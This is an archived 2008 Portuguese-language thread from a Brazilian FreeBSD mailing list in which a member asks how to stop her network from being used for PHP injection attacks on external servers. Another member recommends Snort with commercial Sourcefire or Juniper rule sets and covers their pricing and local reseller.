Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] OT-Ataque PHP injection

2008-02-21 Por tôpico Cristina Fernandes Silva
É cobrada essas regras ? Vc tem alguma faixa de preço  ? é apllicance
? ou somente as regras que posso usar no snort.



Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu:
 Cristina Fernandes Silva escreveu:

  Acho que não fui clara, Vou explicar,
  
   Quero evitar que alguem da minha rede use o meu ip  (endereço ) para
   fazer ataques
   de php injection para outro endereço externo. Até mesmo os meus
   usuarios interno fazer algum ataque para servidores externos..


 Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de
  satisfação vai depender da qualidade das regras de análise de instrusão
  que você utilizar. Isso quer dizer que dependendo do nível de seriedade
  da empresa será proveitoso assinar um serviço (comercial) que oferece
  regras testadas e atualizadas. Apesar da escolha natural ser Source
  Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela
  Juniper. São as mesmas utilizadas no Juniper série 5000, convertidas pro
  Snort.

 -
  Histórico: http://www.fug.com.br/historico/html/freebsd/
  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] OT-Ataque PHP injection

2008-02-21 Por tôpico Patrick Tracanelli
Cristina Fernandes Silva escreveu:
 É cobrada essas regras ? Vc tem alguma faixa de preço  ? é apllicance
 ? ou somente as regras que posso usar no snort.

Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios 
precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, 
não importa se é uma multinacional, pagara como pequeno. No site da 
SourceFire tem todos os detalhes sobre preços.

São só as regras a principio, mas pode comprar o sistema deles. Não 
conheço quem use no país o sistema deles. Mas não parece ser mais do que 
o Snort com um front-end muito amigável.

No caso da Juniper tem direito automaticamente a versão convertida pra 
Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS 
(que é um add-on no firewall Juniper).

No Brasil quem representa a venda das assinaturas Source Fire é a 
BRConnection.

 
 
 
 Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu:
 Cristina Fernandes Silva escreveu:

 Acho que não fui clara, Vou explicar,
  
   Quero evitar que alguem da minha rede use o meu ip  (endereço ) para
   fazer ataques
   de php injection para outro endereço externo. Até mesmo os meus
   usuarios interno fazer algum ataque para servidores externos..


 Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de
  satisfação vai depender da qualidade das regras de análise de instrusão
  que você utilizar. Isso quer dizer que dependendo do nível de seriedade
  da empresa será proveitoso assinar um serviço (comercial) que oferece
  regras testadas e atualizadas. Apesar da escolha natural ser Source
  Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela
  Juniper. São as mesmas utilizadas no Juniper série 5000, convertidas pro
  Snort.

 -
  Histórico: http://www.fug.com.br/historico/html/freebsd/
  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd